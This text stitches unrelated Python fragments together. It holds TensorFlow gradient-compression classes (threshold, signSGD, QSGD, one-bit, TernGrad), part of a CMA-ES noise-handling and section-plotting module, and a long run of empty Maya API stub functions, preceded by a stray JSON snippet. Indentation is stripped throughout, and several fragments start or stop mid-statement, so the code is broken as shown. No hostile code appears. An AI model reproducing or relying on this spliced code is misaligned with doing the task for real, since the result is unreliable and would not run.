"test dataset": {},
"metric": {
"histogram overlap": | |
# tf.concat([y_estimates_neg, y_estimates_pos], 0)
#
# Kneg = tf.size(negative_indices)
# mask = tf.tensor_scatter_nd_update(tf.ones([params['K']], dtype=tf.int32), negative_indices, -tf.ones(Kneg, dtype=tf.int32))
# y_estimates = y_estimates * tf.cast(mask, tf.float64)
# values = tf.cast(tf.reshape(y_estimates, [-1]), tf.float32)
# else:
# values = message
#
# decompressed_indices = tf.expand_dims(decompressed_indices, 1)
# tensor_decompressed = tf.scatter_nd(decompressed_indices, values, [params['N']])
# tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
#
# return tensor_decompressed
#
class Values_Approximation_Logit_Compressor(Compressor):
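# Curve-fitting compressor (behaviour inferred from the code below): for convolutional
# layers, the sorted gradient values are approximated by a least-squares fit over basis
# functions seeded by p0, so only the fit coefficients and the sort permutation are
# transmitted; decompress re-evaluates the fit and scatters the values back into place.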
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
N = tensor_flatten.get_shape().as_list()[0]
params['N'] = int(N)
print("Tensor", tensor, "size:", params['N'])
# params["layers"].add_data(tensor, params['N'])
if Values_Approximation_Helper.is_convolutional(params['model_name'], params['N']):
# p0 = [[0.004, -0.01, -0.04]]
p0 = [[0.001, 0.1, 0.00001]]
num_of_coefficients = len(p0[0])
sorted_indices = tf.argsort(tensor_flatten, axis=0, direction='ASCENDING')
values_sorted = tf.gather(tensor_flatten, sorted_indices)
values_sorted = tf.reshape(values_sorted, [N, 1])
X = np.array(range(1, N + 1), np.float64).reshape([1, N])
X_train = Values_Approximation_Helper.GetInputMatrix(X, p0, N)
coefficients = Values_Approximation_Helper.LeastSquares(X_train, tf.cast(values_sorted, tf.float64))
##################### Logging #####################
filename = resource_loader.get_path_to_datafile('mpi_lib.cpython-36m-x86_64-linux-gnu.so')
library = load_library.load_op_library(filename)
logger = library.logger
logger = logger(tensor_flatten, coefficients, tf.train.get_or_create_global_step(),
bloom_logs_path=params['bloom_logs_path'],
gradient_id=params['gradient_id'],
verbosity_frequency=params['bloom_verbosity_frequency'],
verbosity=params['bloom_verbosity'],
rank=rank())
##################### / Logging #####################
compressed_indices = sorted_indices
with tf.control_dependencies([logger]):
coefficients = tf.reshape(coefficients, [-1])
compressed_indices = tf.cast(compressed_indices, tf.float64)
tensor_compressed = tf.concat([coefficients, compressed_indices], 0)
params['message_size'] = num_of_coefficients
params['X_train'] = X_train
else:
tensor_compressed = tensor
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
tensor_shape = ctx
if Values_Approximation_Helper.is_convolutional(params['model_name'], params['N']):
message, indices = tf.split(tensor_compressed, [params['message_size'], params['N']])
decompressed_indices = tf.cast(indices, tf.int32)
message = tf.expand_dims(message, 1)
y_estimates = tf.matmul(params['X_train'], message)
y_estimates = tf.reshape(y_estimates, [-1])
values = tf.reshape(y_estimates, [-1])
decompressed_indices = tf.expand_dims(decompressed_indices, 1)
tensor_decompressed = tf.scatter_nd(decompressed_indices, tf.cast(values, tf.float32), [params['N']])
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
else:
tensor_decompressed = tensor_compressed
return tensor_decompressed
##########################################################################################
class ThresholdCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
threshold_val = params["threshold_val"]
thr_mask = tf.math.greater_equal(tf.math.abs(tensor_flatten), threshold_val)
values = tf.boolean_mask(tensor_flatten, thr_mask)
indices = tf.reshape(tf.where(thr_mask), [-1])
ctx = tensor_shape
values = tf.bitcast(values, tf.int32)
indices = tf.cast(indices, dtype=tf.int32)
tensor_compressed = tf.concat([values, indices], 0)
params['tensors_size_are_same'] = False
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
values, indices = tf.split(tensor_compressed, 2)
values = tf.bitcast(values, tf.float32)
tensor_shape = ctx
tensor_size = tf.math.reduce_prod(tensor_shape)
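# tf.scatter_update requires a variable, so a persistent zero buffer is reused and
# re-zeroed on each call before the surviving values are scattered into it.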
zero_tensor = tf.Variable(tf.zeros([tensor_size], dtype=tf.float32), trainable=False)
op = zero_tensor.assign(tf.zeros([tensor_size], dtype=tf.float32))
with tf.control_dependencies([op]):
tensor_decompressed = tf.scatter_update(zero_tensor, indices, values)
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
class SignSGDCompressor(Compressor):
""""""
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
agged_tensor = tf.math.add_n(tensors)
agged_tensor = tf.cast(tf.math.greater_equal(agged_tensor, 0), dtype=tf.float32)
agged_tensor = agged_tensor * 2.0 - 1.0
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
tensor_compressed = tf.math.greater_equal(tensor_flatten, 0)
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(sign_encode, ctx, params):
"""Decoding the signs to float format """
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class EFSignSGDCompressor(Compressor):
""""""
residuals = {}
@classmethod
def memory_compensate(cls, tensor, params):
"""Update the tensor with the residuals."""
name = tensor.name
lr = params["learning_rate"]
cls.residuals[tensor.name] = tf.Variable(tf.zeros_like(tensor), trainable=False)
tensor = cls.residuals[name] + lr * tensor
return tensor
@classmethod
def memory_update(cls, tensor, tensor_compensate, tensor_compressed, ctx, params):
"""Update the residuals."""
name = tensor.name
tensor_decompressed = cls.decompress(tensor_compressed, ctx, params)
delta = tensor_compensate - tensor_decompressed
memory_update_op = cls.residuals[name].assign(delta)
return [memory_update_op]
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
lr = params["learning_rate"]
agged_tensor = tf.math.add_n(tensors)
agged_tensor = agged_tensor / lr
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
sign_encode = tf.math.greater_equal(tensor_flatten, 0)
mean = tf.math.reduce_mean(tf.abs(tensor_flatten))
ctx = tensor_shape
tensor_compressed = mean, sign_encode
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
"""Decoding the signs to float format """
mean, sign_encode = tensor_compressed
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
sign_decode = mean * sign_decode
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class SignumCompressor(Compressor):
""""""
momentum = {}
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
agged_tensor = tf.math.add_n(tensors)
agged_tensor = tf.cast(tf.math.greater_equal(agged_tensor, 0), dtype=tf.float32)
agged_tensor = agged_tensor * 2.0 - 1.0
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
# update tensor by momentum
momentum = params["momentum"]
name = tensor.name
SignumCompressor.momentum[name] = tf.Variable(tf.zeros_like(tensor), trainable=False)
tensor = (1.0 - momentum) * tensor + momentum * SignumCompressor.momentum[name]
temp = SignumCompressor.momentum[name].assign(tensor)
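# Adding and subtracting the assigned value makes the tensor depend on the assign op,
# forcing the momentum update to run before the tensor is used downstream.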
tensor = tensor + temp - temp
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
tensor_compressed = tf.math.greater_equal(tensor_flatten, 0)
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(sign_encode, ctx, params):
"""Decoding the signs to float format """
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class QsgdCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
def encode2bool(tensor, quantiles):
tensor = tf.cast(tensor, dtype=tf.int32)
bits = tf.cast(math.log(quantiles, 2) + 1, dtype=tf.int32)
def cond(step, input_tensor, output):
return step < bits
def encode(step, input_tensor, output):
base = tf.constant(2, tf.int32)
temp = tf.floormod(input_tensor, base)
output = output.write(step, temp)
input_tensor = tf.floordiv(input_tensor, base)
return step + 1, input_tensor, output
step = tf.constant(0)
output = tf.TensorArray(dtype=tf.int32, size=0, dynamic_size=True)
_, _, final_output = tf.while_loop(cond, encode, loop_vars=[step, tensor, output])
encode_output = tf.cast(final_output.stack(), dtype=tf.bool)
return encode_output
quantum_num = params["quantum_num"]
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
norm = tf.reshape(tf.norm(tensor_flatten), [-1])
abs_gradient = tf.abs(tensor_flatten)
qnum = tf.cast(quantum_num, dtype=tf.float32)
level_float = qnum / norm * abs_gradient
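# Stochastic rounding: floor the scaled magnitude, then promote it to the next level
# with probability equal to the fractional remainder, keeping the quantizer unbiased
# in expectation.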
previous_level = tf.math.floor(level_float)
prob = tf.random.uniform(tf.shape(tensor_flatten))
is_next_level = tf.cast(tf.math.less(prob, (level_float - previous_level)), tf.float32)
new_level = tf.cast(previous_level + is_next_level, tf.float32)
#new_level = tf.cast(previous_level + is_next_level, tf.int32)
#encode_output = encode2bool(new_level, quantum_num)
#sign = tf.reshape(tf.greater_equal(tensor, 0), [1, -1])
#encode_output = tf.concat([sign, encode_output], 0)
sign = tf.sign(tensor_flatten)
tensor_compressed = new_level * sign
tensor_compressed = tf.cast(tensor_compressed, dtype=tf.int8 if quantum_num < 128 else tf.int16)
tensor_compressed = tensor_compressed, norm
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
def decode4bool(tensor, quantiles):
tensor = tf.cast(tensor, dtype=tf.int32)
bits = tf.cast(math.log(quantiles, 2) + 1, dtype=tf.int32)
def cond(step, input_tensor, output):
return step < bits
def decode(step, input_tensor, output):
base = tf.constant(2, tf.int32)
temp = input_tensor[step, :]
output = output + temp * tf.math.pow(base, step)
return step + 1, input_tensor, output
output = tf.zeros([tf.shape(tensor)[1]], dtype=tf.int32)
step = tf.constant(0)
_, _, decode_output = tf.while_loop(cond, decode, loop_vars=[step, tensor, output])
return decode_output
quantum_num = params["quantum_num"]
qnum = tf.cast(quantum_num, dtype=tf.float32)
tensor_shape = ctx
tensor_compressed, norm = tensor_compressed
#encode_output = tf.cast(encode_output, dtype=tf.int32)
#sign = encode_output[0, :] * 2 - 1
#input_tensor = encode_output[1:, :]
#decode_output = decode4bool(input_tensor, quantum_num)
#decode_output = sign * decode_output
#decode_output = tf.cast(decode_output, dtype=tf.float32)
decode_output = tf.cast(tensor_compressed, dtype=tf.float32)
tensor_decompressed = norm / qnum * decode_output
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
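# A runnable sketch (hypothetical helper, TF2 eager assumed) of the
# stochastic quantization performed by compress() above: rounding up
# with probability equal to the fractional part of the level makes the
# reconstruction an unbiased estimate of x.
def _qsgd_quantize_demo(x, quantum_num=127):
    qnum = float(quantum_num)
    norm = tf.norm(x)
    level = qnum / norm * tf.abs(x)
    lower = tf.math.floor(level)
    round_up = tf.cast(tf.random.uniform(tf.shape(x)) < (level - lower), tf.float32)
    return tf.sign(x) * (lower + round_up) * norm / qnum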
class OnebitCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
mask0 = tf.math.less(tensor_flatten, 0)
sum0 = tf.math.reduce_sum(tf.boolean_mask(tensor_flatten, mask0))
num0 = tf.math.reduce_sum(tf.cast(mask0, dtype=tf.float32))
num0 = tf.where(tf.math.greater(num0, 0), num0, 1.0)
mean0 = sum0 / num0
mask1 = tf.math.logical_not(mask0)
sum1 = tf.math.reduce_sum(tf.boolean_mask(tensor_flatten, mask1))
num1 = tf.math.reduce_sum(tf.cast(mask1, dtype=tf.float32))
num1 = tf.where(tf.math.greater(num1, 0), num1, 1.0)
mean1 = sum1 / num1
mean0 = tf.reshape(mean0, [-1])
mean1 = tf.reshape(mean1, [-1])
mean = tf.concat([mean0, mean1], 0)
ctx = tensor_shape
tensor_compressed = mask0, mean
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
tensor_shape = ctx
mask0, mean = tensor_compressed
mean0, mean1 = tf.split(mean, 2)
mask0 = tf.cast(mask0, dtype=tf.float32)
tensor_decompressed = mask0 * mean0 + (1-mask0) * mean1
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
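# A runnable sketch (hypothetical helper, TF2 eager assumed) of the
# 1-bit reconstruction above: every entry is replaced by the mean of its
# sign bucket, so only one bit per element plus two floats are sent.
def _onebit_demo(x):
    neg = tf.cast(x < 0, tf.float32)
    pos = 1.0 - neg
    mean_neg = tf.reduce_sum(x * neg) / tf.maximum(tf.reduce_sum(neg), 1.0)
    mean_pos = tf.reduce_sum(x * pos) / tf.maximum(tf.reduce_sum(pos), 1.0)
    return neg * mean_neg + pos * mean_pos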
class TerngradCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
std = tf.math.square(tensor_flatten - tf.math.reduce_mean(tensor_flatten))
std = tf.math.sqrt(tf.math.reduce_mean(std))
c = 2.5
gradient = tf.clip_by_value(tensor_flatten, -c * std, c * std)
scaler = tf.math.reduce_max(tf.math.abs(gradient))
zeros = tf.zeros(tf.shape(tensor_flatten))
abs_gradient = tf.abs(gradient)
sign_gradient = tf.sign(gradient)
rnd_sample = tf.random.uniform(tf.shape(tensor_flatten), 0, scaler)
where_cond = tf.less(rnd_sample, abs_gradient)
binarized_gradient = tf.where(where_cond, sign_gradient * scaler, zeros)
new_sign = tf.sign(binarized_gradient) # -1, 0, 1
"""
a = tf.add(new_sign, 1) # shift -1,0,1 to 0,1,2 (2'b00,2'b01,2'b10)
a = tf.reshape(a, [-1])
pad_size = 4 - tf.mod(tf.size(a), 4)
pad = tf.range(0.0, pad_size)
a = tf.concat([a, pad], 0)
a_split1, a_split2, a_split3, a_split4 = tf.split(a, 4) # assume the size is dividable by 4
# encode 4 grads into 1 Byte
sum_1 = tf.add(a_split1, a_split2 * 4)
sum_2 = tf.add(a_split3 * 16, a_split4 * 64)
sum_all = tf.add(sum_1, sum_2)
tensor_compressed = tf.cast(sum_all, tf.uint8)
"""
scaler = tf.reshape(scaler, [-1])
ctx = tensor_shape
| |
len(maxevals) > 2:
self.evaluations = np.median(maxevals)
## meta_parameters.noise_aggregate == None
# a None aggregate means `reeval` falls back to np.median
self.f_aggregate = aggregate
self.evaluations_just_done = 0 # actually conducted evals, only for documentation
self.noiseS = 0
def __call__(self, X, fit, func, ask=None, args=()):
"""proceed with noise measurement, set anew attributes ``evaluations``
(proposed number of evaluations to "treat" noise) and ``evaluations_just_done``
and return a factor for increasing sigma.
Parameters
----------
``X``
a list/sequence/vector of solutions
``fit``
the respective list of function values
``func``
the objective function, ``fit[i]`` corresponds to
``func(X[i], *args)``
``ask``
a method to generate a new, slightly disturbed solution. The
argument is (only) mandatory if ``epsilon`` is not zero, see
`__init__`.
``args``
optional additional arguments to ``func``
Details
-------
Calls the methods `reeval`, `update_measure` and `treat` in
this order. ``self.evaluations`` is adapted within the method
`treat`.
"""
self.evaluations_just_done = 0
if not self.maxevals or self.lam_reeval == 0:
return 1.0
res = self.reeval(X, fit, func, ask, args)
if not len(res):
return 1.0
self.update_measure()
return self.treat()
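# A hedged usage sketch (after the pattern in the cma documentation;
# the surrounding optimizer API is assumed, not shown here): the
# handler is called once per iteration and its return value rescales
# sigma.
#
#     es = cma.CMAEvolutionStrategy(x0, sigma0)
#     nh = NoiseHandler(es.N, maxevals=[1, 1, 30])
#     while not es.stop():
#         X, fit = es.ask_and_eval(func, evaluations=nh.evaluations)
#         es.tell(X, fit)
#         es.sigma *= nh(X, fit, func, es.ask)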
def treat(self):
"""adapt self.evaluations depending on the current measurement
value and return ``sigma_fac in (1.0, self.alphasigma)``
"""
if self.noiseS > 0:
self.evaluations = min((self.evaluations * self.alphaevals, self.maxevals))
return self.alphasigma
else:
self.evaluations = max((self.evaluations * self.alphaevalsdown, self.minevals))
return 1.0 # / self.alphasigma
def reeval(self, X, fit, func, ask, args=()):
"""store two fitness lists, `fit` and ``fitre`` reevaluating some
solutions in `X`.
``self.evaluations`` evaluations are done for each reevaluated
fitness value.
See `__call__`, where `reeval` is called.
"""
self.fit = list(fit)
self.fitre = list(fit)
self.idx = self.indices(fit)
if not len(self.idx):
return self.idx
evals = int(self.evaluations) if self.f_aggregate else 1
fagg = np.median if self.f_aggregate is None else self.f_aggregate
for i in self.idx:
X_i = X[i]
if self.epsilon:
if self.parallel:
self.fitre[i] = fagg(func(ask(evals, X_i, self.epsilon), *args))
else:
self.fitre[i] = fagg([func(ask(1, X_i, self.epsilon)[0], *args)
for _k in range(evals)])
else:
self.fitre[i] = fagg([func(X_i, *args) for _k in range(evals)])
self.evaluations_just_done = evals * len(self.idx)
return self.fit, self.fitre, self.idx
def update_measure(self):
"""updated noise level measure using two fitness lists ``self.fit`` and
``self.fitre``, return ``self.noiseS, all_individual_measures``.
Assumes that ``self.idx`` contains the indices where the fitness
lists differ.
"""
lam = len(self.fit)
idx = np.argsort(self.fit + self.fitre)
ranks = np.argsort(idx).reshape((2, lam))
rankDelta = ranks[0] - ranks[1] - np.sign(ranks[0] - ranks[1])
# compute rank change limits using both ranks[0] and ranks[1]
r = np.arange(1, 2 * lam) # 2 * lam - 1 elements
limits = [0.5 * (Mh.prctile(np.abs(r - (ranks[0, i] + 1 - (ranks[0, i] > ranks[1, i]))),
self.theta * 50) +
Mh.prctile(np.abs(r - (ranks[1, i] + 1 - (ranks[1, i] > ranks[0, i]))),
self.theta * 50))
for i in self.idx]
# compute measurement
# max: 1 rankchange in 2*lambda is always fine
s = np.abs(rankDelta[self.idx]) - Mh.amax(limits, 1) # lives roughly in 0..2*lambda
self.noiseS += self.cum * (np.mean(s) - self.noiseS)
return self.noiseS, s
def indices(self, fit):
"""return the set of indices to be reevaluated for noise
measurement.
Given that the first values are the earliest, this is a useful
policy also with a time-changing objective.
"""
## meta_parameters.noise_reeval_multiplier == 1.0
lam_reev = 1.0 * (self.lam_reeval if self.lam_reeval
else 2 + len(fit) / 20)
lam_reev = int(lam_reev) + ((lam_reev % 1) > np.random.rand())
## meta_parameters.noise_choose_reeval == 1
choice = 1
if choice == 1:
# take n_first first and reev - n_first best of the remaining
n_first = lam_reev - lam_reev // 2
sort_idx = np.argsort(np.array(fit, copy=False)[n_first:]) + n_first
return np.array(list(range(0, n_first)) +
list(sort_idx[0:lam_reev - n_first]), copy=False)
elif choice == 2:
idx_sorted = np.argsort(np.array(fit, copy=False))
# take lam_reev equally spaced, starting with best
linsp = np.linspace(0, len(fit) - len(fit) / lam_reev, lam_reev)
return idx_sorted[[int(i) for i in linsp]]
# take the ``lam_reeval`` best from the first ``2 * lam_reeval + 2`` values.
elif choice == 3:
return np.argsort(np.array(fit, copy=False)[:2 * (lam_reev + 1)])[:lam_reev]
else:
raise ValueError('unrecognized choice value %d for noise reev'
% choice)
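# Worked numbers for choice == 1 (a sketch, values illustrative): with
# len(fit) == 10 and lam_reev == 4, n_first == 2, so indices 0 and 1
# are always taken and the two smallest entries of fit[2:] (offset by
# 2) complete the set of reevaluated solutions.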
class Sections(object):
"""plot sections through an objective function.
A first rational thing to do when facing an (expensive)
application. By default 6 points in each coordinate are evaluated.
This class is still experimental.
Examples
--------
::
import cma, numpy as np
s = cma.Sections(cma.ff.rosen, np.zeros(3)).do(plot=False)
s.do(plot=False) # evaluate the same points again, i.e. check for noise
try:
s.plot()
except:
print('plotting failed: matplotlib.pyplot package missing?')
Details
-------
Data are saved after each function call during `do`. The filename
is attribute ``name`` and by default ``str(func)``, see `__init__`.
A random (orthogonal) basis can be generated with
``cma.Rotation()(np.eye(3))``.
CAVEAT: The default name depends only on the function name, but it
should be unique with respect to all parameters of `__init__` except
`plot_cmd` and `load`. If, for example, a different basis is chosen,
either the name must be changed or the ``.pkl`` file containing the
previous data must first be renamed or deleted.
``s.res`` is a dictionary with an entry for each "coordinate" ``i``
and with an entry ``'x'``, the middle point. Each entry ``i`` is
again a dictionary with keys being different dx values and the
value being a sequence of f-values. For example ``s.res[2][0.1] ==
[0.01, 0.01]``, which is generated using the difference vector
``s.basis[2]`` like
``s.res[2][dx] += func(s.res['x'] + dx * s.basis[2])``.
:See also: `__init__`
"""
def __init__(self, func, x, args=(), basis=None, name=None,
plot_cmd=None, load=True):
"""
Parameters
----------
``func``
objective function
``x``
point in search space, middle point of the sections
``args``
arguments passed to `func`
``basis``
evaluated points are ``func(x + locations[j] * basis[i])
for i in len(basis) for j in len(locations)``,
see `do()`
``name``
filename where to save the result
``plot_cmd``
command used to plot the data, typically matplotlib pyplots
`plot` or `semilogy`
``load``
load previous data from file ``str(func) + '.pkl'``
"""
if plot_cmd is None:
from matplotlib.pyplot import plot as plot_cmd
self.func = func
self.args = args
self.x = x
self.name = name if name else str(func).replace(' ', '_').replace('>', '').replace('<', '')
self.plot_cmd = plot_cmd # or semilogy
self.basis = np.eye(len(x)) if basis is None else basis
try:
self.load()
if any(self.res['x'] != x):
self.res = {}
self.res['x'] = x # TODO: res['x'] does not look perfect
else:
print(self.name + ' loaded')
except:
self.res = {}
self.res['x'] = x
def do(self, repetitions=1, locations=np.arange(-0.5, 0.6, 0.2), plot=True):
"""generates, plots and saves function values ``func(y)``,
where ``y`` is 'close' to `x` (see `__init__()`). The data are stored in
the ``res`` attribute and the class instance is saved in a file
with (the weird) name ``str(func)``.
Parameters
----------
``repetitions``
number of evaluations per point; >1 is useful only for noisy
functions. For ``repetitions==0`` only already generated data are
plotted.
``locations``
coordinate-wise deviations from the middle point given in
`__init__`
"""
if not repetitions:
self.plot()
return
res = self.res
for i in range(len(self.basis)): # i-th coordinate
if i not in res:
res[i] = {}
# xx = np.array(self.x)
# TODO: store res[i]['dx'] = self.basis[i] here?
for dx in locations:
xx = self.x + dx * self.basis[i]
xkey = dx # xx[i] if (self.basis == np.eye(len(self.basis))).all() else dx
if xkey not in res[i]:
res[i][xkey] = []
n = repetitions
while n > 0:
n -= 1
res[i][xkey].append(self.func(xx, *self.args))
if plot:
self.plot()
self.save()
return self
def plot(self, plot_cmd=None, tf=lambda y: y):
"""plot the data we have, return ``self``"""
from matplotlib import pyplot
if not plot_cmd:
plot_cmd = self.plot_cmd
colors = 'bgrcmyk'
pyplot.gcf().clear()
res = self.res
flatx, flatf = self.flattened()
minf = np.inf
for i in flatf:
minf = min((minf, min(flatf[i])))
addf = 1e-9 - minf if minf <= 1e-9 else 0
for i in sorted(res.keys()): # we plot not all values here
if isinstance(i, int):
color = colors[i % len(colors)]
arx = sorted(res[i].keys())
plot_cmd(arx, [tf(np.median(res[i][x]) + addf) for x in arx], color + '-')
pyplot.text(arx[-1], tf(np.median(res[i][arx[-1]])), i)
plot_cmd(flatx[i], tf(np.array(flatf[i]) + addf), color + 'o')
pyplot.ylabel('f + ' + str(addf))
pyplot.draw()
pyplot.ion()
pyplot.show()
return self
def flattened(self):
"""return flattened data ``(x, f)`` such that for the sweep
through | |
**kwargs):
pass
def disown_MPxAttributePatternFactory(*args, **kwargs):
pass
def MPxTransform_minRotLimit_get(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_computeNodeColor_get(*args, **kwargs):
pass
def MPxTransform_scalePivotX_set(*args, **kwargs):
pass
def MPxUITableControl_className(*args, **kwargs):
pass
def MPxHwShaderNode_outColor_set(*args, **kwargs):
pass
def MPxLocatorNode_excludeAsLocator(*args, **kwargs):
pass
def MPxToolCommand__doFinalize(*args, **kwargs):
pass
def MPxImagePlane_colorGain_set(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMin_set(*args, **kwargs):
pass
def MPxRepresentation_setExternalContent(*args, **kwargs):
pass
def MPxTransform_isBounded(*args, **kwargs):
pass
def MPxMotionPathNode_upAxis_set(*args, **kwargs):
pass
def MFnPlugin_registerDevice(*args, **kwargs):
pass
def new_MPxHardwareShader(*args, **kwargs):
pass
def MaterialInputData_diffuse_get(*args, **kwargs):
pass
def MPxFieldNode_mMaxDistance_set(*args, **kwargs):
pass
def MPxModelEditorCommand_swiginit(*args, **kwargs):
pass
def MPxTransform_overrideDisplayType_get(*args, **kwargs):
pass
def MPxTransform_renderLayerId_get(*args, **kwargs):
pass
def MPx3dModelView_setFogColor(*args, **kwargs):
pass
def MPxEmitterNode_mSeed_get(*args, **kwargs):
pass
def MPxImagePlane_colorGainR_get(*args, **kwargs):
pass
def MPxImagePlane_depthBias_set(*args, **kwargs):
pass
def MPx3dModelView_setIncludeInvisible(*args, **kwargs):
pass
def MPxHwShaderNode_outColorG_set(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writePreConnectAttrsBlock(*args, **kwargs):
pass
def MPxTransform_overridePlayback_set(*args, **kwargs):
pass
def MPxObjectSet_groupNodes_set(*args, **kwargs):
pass
def MPxManipContainer_swiginit(*args, **kwargs):
pass
def MFnPlugin_deregisterControlCommand(*args, **kwargs):
pass
def MPxRenderPassImpl_getNumChannels(*args, **kwargs):
pass
def MPxSurfaceShape_geometryIteratorSetup(*args, **kwargs):
pass
def MPxIkSolverNode_swigregister(*args, **kwargs):
pass
def MPxNode_addExternalContentForFileAttr(*args, **kwargs):
pass
def MPxBakeEngine_swigregister(*args, **kwargs):
pass
def MPxNode_attributeAffects(*args, **kwargs):
pass
def MPxFieldNode_mInputData_set(*args, **kwargs):
pass
def MPxFileResolver_resolveURI(*args, **kwargs):
pass
def MPxTransform_rotateAxisY_get(*args, **kwargs):
pass
def delete_MPxManipulatorNode(*args, **kwargs):
pass
def MPxTransform_maxRotYLimitEnable_set(*args, **kwargs):
pass
def delete_MPxPolyTrg(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxSizeX_set(*args, **kwargs):
pass
def new_MPxTransformationMatrix(*args, **kwargs):
pass
def MPxManipContainer_connectToDependNode(*args, **kwargs):
pass
def MPxTransform_getMatrixInverse(*args, **kwargs):
pass
def MPxSurfaceShape_nodeBoundingBoxSizeY_get(*args, **kwargs):
pass
def MPxManipulatorNode_yColor(*args, **kwargs):
pass
def MPxMotionPathNode_bankScale_set(*args, **kwargs):
pass
def MPxManipContainer_draw(*args, **kwargs):
pass
def MPxGeometryIterator_hasNormals(*args, **kwargs):
pass
def MPxMotionPathNode_rotateOrder_set(*args, **kwargs):
pass
def MPxImagePlane_imageType_get(*args, **kwargs):
pass
def MPxEmitterNode_mCurrentTime_get(*args, **kwargs):
pass
def MPxImagePlane_displayOnlyIfCurrent_get(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidJitter_get(*args, **kwargs):
pass
def delete_MPxCommand(*args, **kwargs):
pass
def MPxCacheFormat_writeInt32(*args, **kwargs):
pass
def MPxLocatorNode_parentMatrix_set(*args, **kwargs):
pass
def MPxFieldNode_mInputVelocities_get(*args, **kwargs):
pass
def MPxCameraSet_order_set(*args, **kwargs):
pass
def MPxTransform_lodVisibility_get(*args, **kwargs):
pass
def MPxTransform_rotateX_get(*args, **kwargs):
pass
def MPxSurfaceShape_center_set(*args, **kwargs):
pass
def MPxFieldNode_mInputPositions_get(*args, **kwargs):
pass
def MPxSurfaceShape_matrix_set(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMax_set(*args, **kwargs):
pass
def MPxObjectSet_isLayer_get(*args, **kwargs):
pass
def MPxContextCommand_appendSyntax(*args, **kwargs):
pass
def MPxAssembly_deleteRepresentation(*args, **kwargs):
pass
def MPxDragAndDropBehavior_swigregister(*args, **kwargs):
pass
def MFnPlugin_deregisterModelEditorCommand(*args, **kwargs):
pass
def MPxTexContext_className(*args, **kwargs):
pass
def MPxFieldNode_mDeltaTime_set(*args, **kwargs):
pass
def MPxGeometryData_iterator(*args, **kwargs):
pass
def MPxFileTranslator_haveReferenceMethod(*args, **kwargs):
pass
def delete_MPxFluidEmitterNode(*args, **kwargs):
pass
def MPxTransform_maxScaleYLimit_set(*args, **kwargs):
pass
def MPxTransform_maxScaleYLimitEnable_set(*args, **kwargs):
pass
def MPxLocatorNode_swiginit(*args, **kwargs):
pass
def MPxTransform_shearTo(*args, **kwargs):
pass
def MPxBlendShape_inputTargetItem_set(*args, **kwargs):
pass
def MExternalContentInfoTable_getEntryByIndex(*args, **kwargs):
pass
def MPx3dModelView_setDisplayHUD(*args, **kwargs):
pass
def delete_MPxSelectionContext(*args, **kwargs):
pass
def MPxSelectionContext_feedbackNumericalInput(*args, **kwargs):
pass
def MPx3dModelView_preMultipleDraw(*args, **kwargs):
pass
def MPxEmitterNode_mRandStateZ_get(*args, **kwargs):
pass
def MPxTexContext_viewToPort(*args, **kwargs):
pass
def MFnPlugin_deregisterData(*args, **kwargs):
pass
def MPxImagePlane_coverageY_set(*args, **kwargs):
pass
def MPxEmitterNode_mOutput_get(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetG_set(*args, **kwargs):
pass
def MPx3dModelView_worldToView(*args, **kwargs):
pass
def MPxComponentShape_match(*args, **kwargs):
pass
def MPxImagePlane_center_get(*args, **kwargs):
pass
